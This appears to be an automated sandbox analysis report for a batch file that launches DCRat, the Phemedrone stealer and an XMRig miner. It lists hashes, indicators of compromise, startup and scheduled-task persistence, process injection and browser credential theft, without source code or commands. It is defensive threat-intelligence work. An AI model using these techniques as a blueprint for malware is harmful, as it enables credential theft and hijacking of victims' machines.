phemedrone | de08c69d06b2f176058aa6001b9f9195ef9599f1f79b783e21762046258583d3

Resubmissions

04-03-2024 05:33

240304-f84jnsca52 10

04-03-2024 04:18

240304-exd9zahe9z 10

Analysis

max time kernel
127s
max time network
159s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
04-03-2024 04:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dcrat/123.bat
Size

66B
MD5

572472c7cc450eedfcd8061e7f64eb96
SHA1

6d315e5521592f668dc2899eaa83f2ac9cbe99c4
SHA256

b449f5170c97f7328ce8ff6f2d741c489de4fc9640dcd1a4781349c60f25d934
SHA512

f89b64c7300aa52b1bba95f1a45fb1dcc1ef13ed81bb0e671159120f909bba94a9762de9c78056f1f535e2797efffa689e6e10b73ca3a0997b307361619883b6

Score

10^/10

phemedrone xmrig miner spyware stealer

Malware Config

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/5004-4489-0x0000000000190000-0x0000000000CA1000-memory.dmp	xmrig
behavioral1/memory/5004-4491-0x0000000000190000-0x0000000000CA1000-memory.dmp	xmrig

Drops startup file 3 IoCs

Processes:

regedit.exeSetupTcpipDriver.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe	regedit.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe	SetupTcpipDriver.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe	SetupTcpipDriver.exe

Executes dropped EXE 17 IoCs

Processes:

DCRatLauncher.exeSetupUDPDriver.exeHyfatok.exeCL_Debug_Log.txtSetupTCPIP6Driver.exeSetupTcpipDriver.exeregedit.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exetor.exeHelper.exeHelper.exeHelper.exeHelper.exe

pid	process
2472	DCRatLauncher.exe
1664	SetupUDPDriver.exe
1904	Hyfatok.exe
2980	CL_Debug_Log.txt
2820	SetupTCPIP6Driver.exe
1984	SetupTcpipDriver.exe
2300	regedit.exe
296	Helper.exe
2232	Helper.exe
400	Helper.exe
2272	Helper.exe
2224	Helper.exe
3480	tor.exe
4664	Helper.exe
4704	Helper.exe
4692	Helper.exe
4876	Helper.exe

Loads dropped DLL 13 IoCs

Processes:

SetupUDPDriver.exetaskeng.exeHelper.exetor.exe

pid	process
1664	SetupUDPDriver.exe
1788	taskeng.exe
1788	taskeng.exe
3120
400	Helper.exe
400	Helper.exe
3480	tor.exe
3480	tor.exe
3480	tor.exe
3480	tor.exe
3480	tor.exe
3480	tor.exe
4864

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 ip-api.com

flow	ioc
2	ip-api.com

AutoIT Executable 14 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\64.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\32.exe	autoit_exe
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe
\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe	autoit_exe

Drops file in System32 directory 5 IoCs

Processes:

DCRat.exeSetupTcpipDriver.exe

description	ioc	process
File created	C:\Windows\System32\SetupTcpipDriver.exe	DCRat.exe
File opened for modification	C:\Windows\System32\SetupTcpipDriver.exe	DCRat.exe
File opened for modification	C:\Windows\System32\SetupTcpipDriver.exe	SetupTcpipDriver.exe
File created	C:\Windows\System32\SetupTCPIP6Driver.exe	DCRat.exe
File opened for modification	C:\Windows\System32\SetupTCPIP6Driver.exe	DCRat.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Helper.exe

description	pid	process	target process
PID 400 set thread context of 2224	400	Helper.exe	Helper.exe
PID 400 set thread context of 4664	400	Helper.exe	Helper.exe
PID 400 set thread context of 5004	400	Helper.exe	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2440 schtasks.exe

pid	process
2440	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2272	timeout.exe
1968	timeout.exe
3452	timeout.exe
3860	timeout.exe
3792	timeout.exe
3212	timeout.exe
1520	timeout.exe
1748	timeout.exe
676	timeout.exe
2612	timeout.exe
3164	timeout.exe
4384	timeout.exe
4020	timeout.exe
3084	timeout.exe
3592	timeout.exe
3840	timeout.exe
3556	timeout.exe
4872	timeout.exe
2576	timeout.exe
996	timeout.exe
2232	timeout.exe
3152	timeout.exe
2272	timeout.exe
932	timeout.exe
1656	timeout.exe
3228	timeout.exe
3768	timeout.exe
2040	timeout.exe
1700	timeout.exe
1484	timeout.exe
3540	timeout.exe
3960	timeout.exe
2508	timeout.exe
4876	timeout.exe
1824	timeout.exe
2224	timeout.exe
2912	timeout.exe
3824	timeout.exe
3920	timeout.exe
1008	timeout.exe
1968	timeout.exe
996	timeout.exe
3488	timeout.exe
1496	timeout.exe
3820	timeout.exe
3236	timeout.exe
3436	timeout.exe
3640	timeout.exe
3356	timeout.exe
3212	timeout.exe
4248	timeout.exe
1972	timeout.exe
3960	timeout.exe
3104	timeout.exe
3104	timeout.exe
3792	timeout.exe
3200	timeout.exe
792	timeout.exe
5084	timeout.exe
4172	timeout.exe
4924	timeout.exe
4160	timeout.exe
4268	timeout.exe
3604	timeout.exe

Modifies Internet Explorer settings 1 TTPs 63 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "22"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "276"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{80B34F11-D9DE-11EE-B98D-4AE872E97954} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "224"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000c12c25e2ddfb54dbf19c8710c230677000000000200000000001066000000010000200000008bb6f874edb26cdee5ee955b758cdbdcb7851ef6fcffd092cbb79f4a918b1bc7000000000e8000000002000020000000f282ab409bd0b3e763e4808a8dc367c83ed0d41cabba9a2c05d666533d7abc9d2000000029fec1e6e02f0e6b5cb9f68428f27c5c1f90cef1c25b31a096b042eb4bc405e5400000001006f66e9bfb46cf266f9e2dc0e7c25ba795ee2de9b5c2bed242baa26d6f2dd64948532754889b3fe784a925a7a5764cb3e0f5c89eda5bdf67e67bf127ed3cf7	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "229"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "229"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "276"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "42"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "22"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "276"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0c38b50eb6dda01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000c12c25e2ddfb54dbf19c8710c23067700000000020000000000106600000001000020000000ad04b4c73151efb7f38a4213efded359677045c05c2267b32c28541d1ba4ce43000000000e8000000002000020000000f48f4cadf47666fa933ceb43578e17b8f9432c8bff10f002219de52302803eef400100008677dd6055b64b40e6405c478c87acf8bfd30444650acbe4ef4c604d3d573db3cb1b40d9575cfbf86977c050d311a35c7e7a078dde0d51a624b60c7955645c4301e71737037f729f96e10f9b0793fbd5e7642cf8abad86db9d440d6f3b6be788fe1cd9bf65bf025b53ccb73f803d5f3211e85fc02fe1d1bf70540272c18e09f0a66f4d8ad613946710ff0095abda45584e7f16977d46f655950b8276468865e9cde538e2bf788d74f1450531105596f2fb9859106e9a864a7243897b9acdf90d48d71ab8ba1bf1c961854cfc7ec0c2461e4df1b2624c266d082f88976fd115b5a59d2b95c2755973cc22b8a4ba9e868b631eb1cb3bd65e87e97b548197d498e67ee89a38cd09d26417784ea236d2c8f812f01b7b64573defc01f4d7e660993a3f837de6d98def9881cfbd94aaf2c9c7fea18ddd67dc0eff0ee9790f07996f1a34000000019fd700985db8a909de4f6afc1a4944490ac67b6c9a3a56ff17d2182ac32c22092d25b06e2942b5a26d18fb69265c08042bfccee97197002743ec6eb1371d815	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "22"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "122"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "229"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "415687887"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "224"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.java.com\ = "42"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\DOMStorage\java.com\Total = "224"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe

NTFS ADS 3 IoCs

Processes:

SetupUDPDriver.exeHelper.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\dcrat\winmgmts:\HSNHLVYA\root\CIMV2	SetupUDPDriver.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\root\cimv2	Helper.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\HSNHLVYA\root\CIMV2	Helper.exe

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

2300 regedit.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
2300	regedit.exe

description	flow	ioc
HTTP User-Agent header	104	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

DCRat.exepowershell.exepowershell.exepowershell.exeHyfatok.exepowershell.exeSetupUDPDriver.exe

pid	process
2972	DCRat.exe
2972	DCRat.exe
2972	DCRat.exe
1412	powershell.exe
2228	powershell.exe
2200	powershell.exe
1904	Hyfatok.exe
1056	powershell.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

476

pid	process
476

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

DCRat.exepowershell.exepowershell.exepowershell.exeHyfatok.exepowershell.exeCL_Debug_Log.txtpowershell.exeHelper.exeHelper.exeattrib.exe

description	pid	process
Token: SeDebugPrivilege	2972	DCRat.exe
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	1904	Hyfatok.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeRestorePrivilege	2980	CL_Debug_Log.txt
Token: 35	2980	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2980	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2980	CL_Debug_Log.txt
Token: SeDebugPrivilege	988	powershell.exe
Token: SeRestorePrivilege	2224	Helper.exe
Token: 35	2224	Helper.exe
Token: SeSecurityPrivilege	2224	Helper.exe
Token: SeSecurityPrivilege	2224	Helper.exe
Token: SeRestorePrivilege	4664	Helper.exe
Token: 35	4664	Helper.exe
Token: SeSecurityPrivilege	4664	Helper.exe
Token: SeSecurityPrivilege	4664	Helper.exe
Token: SeLockMemoryPrivilege	5004	attrib.exe
Token: SeLockMemoryPrivilege	5004	attrib.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

SetupUDPDriver.exeiexplore.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeattrib.exe

pid	process
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1808	iexplore.exe
296	Helper.exe
296	Helper.exe
296	Helper.exe
2232	Helper.exe
2232	Helper.exe
2232	Helper.exe
400	Helper.exe
400	Helper.exe
400	Helper.exe
2272	Helper.exe
2272	Helper.exe
2272	Helper.exe
4704	Helper.exe
4704	Helper.exe
4704	Helper.exe
4692	Helper.exe
4692	Helper.exe
4692	Helper.exe
4876	Helper.exe
4876	Helper.exe
4876	Helper.exe
5004	attrib.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

SetupUDPDriver.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exeHelper.exe

pid	process
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
1664	SetupUDPDriver.exe
296	Helper.exe
296	Helper.exe
296	Helper.exe
2232	Helper.exe
2232	Helper.exe
2232	Helper.exe
400	Helper.exe
400	Helper.exe
400	Helper.exe
2272	Helper.exe
2272	Helper.exe
2272	Helper.exe
4704	Helper.exe
4704	Helper.exe
4704	Helper.exe
4692	Helper.exe
4692	Helper.exe
4692	Helper.exe
4876	Helper.exe
4876	Helper.exe
4876	Helper.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid process

1808 iexplore.exe
1808 iexplore.exe
1068 IEXPLORE.EXE
1068 IEXPLORE.EXE
2908 IEXPLORE.EXE
2908 IEXPLORE.EXE

pid	process
1808	iexplore.exe
1808	iexplore.exe
1068	IEXPLORE.EXE
1068	IEXPLORE.EXE
2908	IEXPLORE.EXE
2908	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exeDCRat.exeDCRatLauncher.exeiexplore.exeSetupUDPDriver.execmd.exe

description	pid	process	target process
PID 1892 wrote to memory of 2972	1892	cmd.exe	DCRat.exe
PID 1892 wrote to memory of 2972	1892	cmd.exe	DCRat.exe
PID 1892 wrote to memory of 2972	1892	cmd.exe	DCRat.exe
PID 2972 wrote to memory of 1412	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 1412	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 1412	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2472	2972	DCRat.exe	DCRatLauncher.exe
PID 2972 wrote to memory of 2228	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 2228	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 2228	2972	DCRat.exe	powershell.exe
PID 2472 wrote to memory of 1808	2472	DCRatLauncher.exe	iexplore.exe
PID 2472 wrote to memory of 1808	2472	DCRatLauncher.exe	iexplore.exe
PID 2472 wrote to memory of 1808	2472	DCRatLauncher.exe	iexplore.exe
PID 2472 wrote to memory of 1808	2472	DCRatLauncher.exe	iexplore.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 1664	2972	DCRat.exe	SetupUDPDriver.exe
PID 2972 wrote to memory of 2200	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 2200	2972	DCRat.exe	powershell.exe
PID 2972 wrote to memory of 2200	2972	DCRat.exe	powershell.exe
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
PID 1808 wrote to memory of 1068	1808	iexplore.exe	IEXPLORE.EXE
